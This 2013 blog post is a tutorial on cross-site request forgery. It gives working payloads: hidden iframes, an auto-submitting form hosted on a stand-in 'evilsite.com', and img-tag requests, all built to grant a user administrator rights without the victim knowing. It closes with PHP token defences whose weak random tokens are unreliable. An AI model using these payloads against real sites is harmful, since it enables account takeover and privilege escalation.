Tuesday, 22 January 2013

(CSRF) Cross Site Request Forgery



Post: #1(CSRF) Cross Site Request Forgery



Code:
The content of this article is meant for educational purposes only. Neither I, nor my web host will be held responsible for what you decide to do with this knowledge.

_______________________________________________________________________________


CSRF attacks are used for a variety of reasons by attackers. The most common being:
Logging out a user
Transferring money
Changing a password
Modifying information
All of the above are performed from the victims own account.

A CSRF attack is fairly simple to do yet can also be fairly difficult to detect the attack. The reason for it being difficult is that the actions are all seemingly performed by a legitimate user.

There are a few ways that an attacker may perform a CSRF attack but in this post we are going to cover the 2 most popular ways:

_______________________________________________________________________________

Code:
XSS
IMG Injection

_______________________________________________________________________________

XSS
For the XSS method to work, we need to inject Javascript in to the target site and execute a query as the victim user. One example in which this could be used would be to promote a user to admin status.

If the admin page uses $_GET() or $_REQUEST() as it's input, the following would work:

_______________________________________________________________________________

Code:
<iframe src='javascript:window.location="http://www.vulnsite.com/admin.php?edituser=v3nd3tta&addgroup=administrator";' height='0' width='0' style='border:0;' />

_______________________________________________________________________________

The height, width and style arguments will hide the iframe, so the administrator doesn't suspect anything when the page magically redirects to the admin.php page.

If the admin page uses $_POST() as it's input, the following would work.

1 - Create a web-page hosted somewhere online and use code similar to the following, change the form inputs as necessary:

_______________________________________________________________________________

Code:
<html>
<body>
<form action="" method="post" id="formid">
    <input type="hidden" name="attack" value="valuegoeshere" />
</form>
<script>document.getElementById('formid').submit();</script>
</body>
</html>

_______________________________________________________________________________

2. You need to embed the page with an iframe on the XSS vuln page like follows:

_______________________________________________________________________________

Code:
<iframe src='http://www.evilsite.com/csrfrider.php' height='0' width='0' style='border:0;' />

_______________________________________________________________________________


This will cause the form to automatically post to the administration page if an administrator loads it. As it's hiding in the iframe, it requires little to no social engineering to get the administrator to load the page.

IMG Injection
This is another popular method of hiding a CSRF attack with the use of "img" tags. This is an extremely popular method when it comes to bulletin board systems. The reason being that img tags often provide little to no checking.

Embedding the CSRF attack within [img] tags will in turn, look like the following within the HTML source:

_______________________________________________________________________________

Code:
<img src='http://www.example.com/admin.php?edituser=v3nd3tta&addgroup=administrator' />

_______________________________________________________________________________

When the admin accesses the page, the attack will take place while he has no idea it has taken place.

Protection
While using the POST method for all forms will help to safeguard against CSRF attacks, it is not at all bulletproof. The recommended way to protect against CSRF attacks is to use unique tokens on forms. A token is used within a hidden element in a form to prove that the request is not being forged. Each token is unique to the user, and is stored in the user's session. To set up tokens, use the following code:

_______________________________________________________________________________

Code:
session_start();
if( !isset( $_SESSION['token'] ) )
{
    $token = md5( rand() );
    $token = str_split( $token, 10 );
    $_SESSION['token'] = $token[0];
}

_______________________________________________________________________________

The above will create the token and store it in the user's session. A hidden value will have to be located in the form input as follows:

_______________________________________________________________________________

Code:
<input type='hidden' name='token' value='<?=$_SESSION['token']?>' />

_______________________________________________________________________________

The third part of the token check is to add the validation as follows:

_______________________________________________________________________________

Code:
if( $_POST['token'] == $_SESSION['token'] )
{
    /* Token is valid, continue */
}
_______________________________________________________________________________

0 comments:

Post a Comment